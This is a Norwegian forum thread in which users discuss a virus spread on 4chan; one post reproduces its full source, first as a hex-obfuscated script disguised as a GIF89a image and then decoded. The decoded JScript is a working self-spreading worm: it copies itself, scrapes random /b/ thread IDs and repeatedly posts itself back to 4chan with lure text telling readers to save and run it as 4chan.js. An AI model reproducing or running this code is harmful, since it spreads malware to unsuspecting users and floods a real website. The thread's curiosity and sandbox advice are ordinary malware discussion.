Gå til innhold

4chan bilete- og diskusjonstråd

Zeph

Av Zeph
i Humor

Anbefalte innlegg

Videoannonse

Videoannonse
Annonse
L4r5

L4r5

Skrevet
Skrevet
Noen som vet hva viruset gjør? Evt. har kildekode.

Skal jeg teste? Hadde jeg ikke vært redd for barneporno :( kunne jeg sikkert gjort det :)

Ja. Kjør det på en ren maskin ut mot et simulert internett og så kjører du portspeiling på den aktuelle porten sånn at du kan se trafikken med en protokollanalysator på en annen maskin. Da kan du gjøre det trygt uten at du risikerer noen ting.

Nopros

Nopros

Skrevet
Skrevet

Neh, minnepinnen er to etasjer ned og jeg har noen viktige skoleting på denne pcn :p

 

abgf2d.jpg

 

Ja. Kjør det på en ren maskin ut mot et simulert internett og så kjører du portspeiling på den aktuelle porten sånn at du kan se trafikken med en protokollanalysator på en annen maskin. Da kan du gjøre det trygt uten at du risikerer noen ting.

Hørrtes lurt ut, men i og med at jeg ikke skjønte en dritt, så lot jeg være :p

A-Jay

A-Jay

Skrevet
Skrevet
Noen som vet hva viruset gjør? Evt. har kildekode.

 

Selve GIF-filen (som altså skal kjøres som .js) inneholder blant annet:

 

 

function GIF89a(){}eval(unescape('\x78\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x4d\x73\x78\x6d\x6c\x32\x2e\x78\x6d\x6c\x68\x74\x74\x70\x22\x29\x0d\x0a\x66\x73\x6f\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x73\x63\x72\x69\x70\x74\x69\x6e\x67\x2e\x66\x69\x6c\x65\x73\x79\x73\x74\x65\x6d\x6f\x62\x6a\x65\x63\x74\x22\x29\x0d\x0a\x77\x73\x68\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x57\x73\x63\x72\x69\x70\x74\x2e\x73\x68\x65\x6c\x6c\x22\x29\x0d\x0a\x77\x73\x68\x2e\x63\x75\x72\x72\x65\x6e\x74\x64\x69\x72\x65\x63\x74\x6f\x72\x79\x3d\x66\x73\x6f\x2e\x67\x65\x74\x73\x70\x65\x63\x69\x61\x6c\x66\x6f\x6c\x64\x65\x72\x28\x32\x29\x0d\x0a\x67\x68\x6a\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x53\x44\x4b\x48\x64\x73\x22\x29\x3b\x67\x68\x6a\x2e\x77\x72\x69\x74\x65\x28\x22\x6c\x6f\x6c\x22\x29\x0d\x0a\x0d\x0a\x66\x73\x6f\x2e\x63\x6f\x70\x79\x66\x69\x6c\x65\x28\x57\x53\x48\x2e\x73\x63\x72\x69\x70\x74\x66\x75\x6c\x6c\x6e\x61\x6d\x65\x2c\x22\x32\x22\x29\x0d\x0a\x0d\x0a\x6d\x73\x67\x3d\x22\x31\x2e\x20\x4f\x70\x65\x6e\x20\x74\x68\x69\x73\x20\x69\x6d\x61\x67\x65\x2e\x5c\x6e\x32\x2e\x20\x54\x68\x65\x20\x69\x6d\x61\x67\x65\x20\x63\x61\x6e\x6e\x6f\x74\x20\x62\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x65\x64\x2e\x5c\x6e\x33\x2e\x20\x53\x61\x76\x65\x20\x69\x74\x20\x61\x73\x20\x34\x63\x68\x61\x6e\x2e\x6a\x73\x5c\x6e\x34\x2e\x20\x4f\x70\x65\x6e\x20\x74\x68\x65\x20\x66\x69\x6c\x65\x20\x79\x6f\x75\x20\x73\x61\x76\x65\x64\x2e\x5c\x6e\x35\x2e\x20\x53\x48\x49\x54\x20\x42\x52\x49\x43\x4b\x53\x22\x0d\x0a\x0d\x0a\x6e\x3d\x30\x0d\x0a\x77\x68\x69\x6c\x65\x28\x31\x29\x7b\x0d\x0a\x6e\x2b\x2b\x0d\x0a\x63\x3d\x6d\x73\x67\x2b\x22\x5c\x6e\x5c\x6e\x22\x2b\x6e\x0d\x0a\x78\x2e\x6f\x70\x65\x6e\x28\x22\x67\x65\x74\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x6d\x67\x2e\x34\x63\x68\x61\x6e\x2e\x6f\x72\x67\x2f\x62\x2f\x3f\x22\x2b\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2c\x30\x29\x0d\x0a\x78\x2e\x73\x65\x6e\x64\x28\x29\x0d\x0a\x74\x3d\x78\x2e\x72\x65\x73\x70\x6f\x6e\x73\x65\x74\x65\x78\x74\x2e\x6d\x61\x74\x63\x68\x28\x2f\x3c\x73\x70\x61\x6e\x20\x69\x64\x3d\x22\x6e\x6f\x74\x68\x72\x65\x61\x64\x5c\x64\x2b\x2f\x67\x29\x0d\x0a\x74\x3d\x74\x5b\x4d\x61\x74\x68\x2e\x66\x6c\x6f\x6f\x72\x28\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x74\x2e\x6c\x65\x6e\x67\x74\x68\x29\x5d\x2e\x6d\x61\x74\x63\x68\x28\x2f\x5c\x64\x2b\x2f\x29\x5b\x30\x5d\x0d\x0a\x62\x3d\x28\x22\x22\x2b\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x29\x2e\x73\x75\x62\x73\x74\x72\x28\x32\x29\x0d\x0a\x73\x3d\x22\x5c\x6e\x2d\x2d\x22\x2b\x62\x2b\x22\x5c\x6e\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x64\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x6e\x61\x6d\x65\x3d\x22\x0d\x0a\x73\x3d\x73\x2b\x22\x72\x65\x73\x74\x6f\x5c\x6e\x5c\x6e\x22\x2b\x74\x2b\x73\x2b\x22\x63\x6f\x6d\x5c\x6e\x5c\x6e\x22\x2b\x63\x2b\x73\x2b\x22\x75\x70\x66\x69\x6c\x65\x3b\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x2b\x6e\x2b\x22\x2e\x67\x67\x67\x5c\x6e\x5c\x6e\x22\x0d\x0a\x76\x61\x72\x20\x66\x31\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x31\x22\x29\x0d\x0a\x66\x31\x2e\x77\x72\x69\x74\x65\x28\x73\x29\x0d\x0a\x66\x31\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0d\x0a\x73\x3d\x22\x5c\x6e\x2d\x2d\x22\x2b\x62\x2b\x22\x5c\x6e\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x64\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x6e\x61\x6d\x65\x3d\x22\x0d\x0a\x73\x3d\x22\x5c\x30\x22\x2b\x6e\x2b\x73\x2b\x22\x6d\x6f\x64\x65\x5c\x6e\x5c\x6e\x72\x65\x67\x69\x73\x74\x22\x0d\x0a\x76\x61\x72\x20\x66\x33\x3d\x66\x73\x6f\x2e\x63\x72\x65\x61\x74\x65\x74\x65\x78\x74\x66\x69\x6c\x65\x28\x22\x33\x22\x29\x0d\x0a\x66\x33\x2e\x77\x72\x69\x74\x65\x28\x73\x29\x0d\x0a\x66\x33\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0d\x0a\x77\x73\x68\x2e\x72\x75\x6e\x28\x22\x43\x4d\x44\x20\x2f\x43\x20\x63\x6f\x70\x79\x2f\x42\x20\x31\x2b\x32\x2b\x33\x20\x6f\x6b\x2e\x74\x78\x74\x22\x2c\x30\x2c\x31\x29\x0d\x0a\x76\x61\x72\x20\x61\x3d\x57\x53\x48\x2e\x63\x72\x65\x61\x74\x65\x6f\x62\x6a\x65\x63\x74\x28\x22\x61\x64\x6f\x64\x62\x2e\x73\x74\x72\x65\x61\x6d\x22\x29\x0d\x0a\x61\x2e\x6d\x6f\x64\x65\x3d\x33\x3b\x61\x2e\x74\x79\x70\x65\x3d\x31\x3b\x61\x2e\x6f\x70\x65\x6e\x28\x29\x0d\x0a\x61\x2e\x6c\x6f\x61\x64\x66\x72\x6f\x6d\x66\x69\x6c\x65\x28\x66\x73\x6f\x2e\x67\x65\x74\x61\x62\x73\x6f\x6c\x75\x74\x65\x70\x61\x74\x68\x6e\x61\x6d\x65\x28\x22\x6f\x6b\x2e\x74\x78\x74\x22\x29\x29\x0d\x0a\x78\x2e\x6f\x70\x65\x6e\x28\x22\x70\x6f\x73\x74\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f\x2f\x64\x61\x74\x2e\x34\x63\x68\x61\x6e\x2e\x6f\x72\x67\x2f\x62\x2f\x69\x6d\x67\x62\x6f\x61\x72\x64\x2e\x70\x68\x70\x22\x2c\x30\x29\x0d\x0a\x78\x2e\x73\x65\x74\x72\x65\x71\x75\x65\x73\x74\x68\x65\x61\x64\x65\x72\x28\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x22\x2c\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x62\x6f\x75\x6e\x64\x61\x72\x79\x3d\x22\x2b\x62\x29\x0d\x0a\x78\x2e\x73\x65\x6e\x64\x28\x61\x29\x0d\x0a\x57\x53\x48\x2e\x73\x6c\x65\x65\x70\x28\x35\x30\x30\x30\x2b\x4d\x61\x74\x68\x2e\x63\x65\x69\x6c\x28\x4d\x61\x74\x68\x2e\x72\x61\x6e\x64\x6f\x6d\x28\x29\x2a\x31\x35\x30\x30\x30\x29\x29\x0d\x0a\x7d'))

 

 

 

Hvis man dekoder heksadesimal-kodene får man:

 

 

 

x=WSH.createobject("Msxml2.xmlhttp")
fso=WSH.createobject("scripting.filesystemobject")
wsh=WSH.createobject("Wscript.shell")
wsh.currentdirectory=fso.getspecialfolder(2)
ghj=fso.createtextfile("SDKHds");ghj.write("lol")

fso.copyfile(WSH.scriptfullname,"2")

msg="1. Open this image.\n2. The image cannot be displayed.\n3. Save it as 4chan.js\n4. Open the file you saved.\n5. SHIT BRICKS"

n=0
while(1){
n++
c=msg+"\n\n"+n
x.open("get","http://img.4chan.org/b/?"+Math.random(),0)
x.send()
t=x.responsetext.match(/<span id="nothread\d+/g)
t=t[Math.floor(Math.random()*t.length)].match(/\d+/)[0]
b=(""+Math.random()).substr(2)
s="\n--"+b+"\ncontent-disposition:form-data;name="
s=s+"resto\n\n"+t+s+"com\n\n"+c+s+"upfile;filename="+n+".ggg\n\n"
var f1=fso.createtextfile("1")
f1.write(s)
f1.close()
s="\n--"+b+"\ncontent-disposition:form-data;name="
s=""+n+s+"mode\n\nregist"
var f3=fso.createtextfile("3")
f3.write(s)
f3.close()
wsh.run("CMD /C copy/B 1+2+3 ok.txt",0,1)
var a=WSH.createobject("adodb.stream")
a.mode=3;a.type=1;a.open()
a.loadfromfile(fso.getabsolutepathname("ok.txt"))
x.open("post","http://dat.4chan.org/b/imgboard.php",0)
x.setrequestheader("Content-type","multipart/form-data;boundary="+b)
x.send(a)
WSH.sleep(5000+Math.ceil(Math.random()*15000))
}

 

 

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste

  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...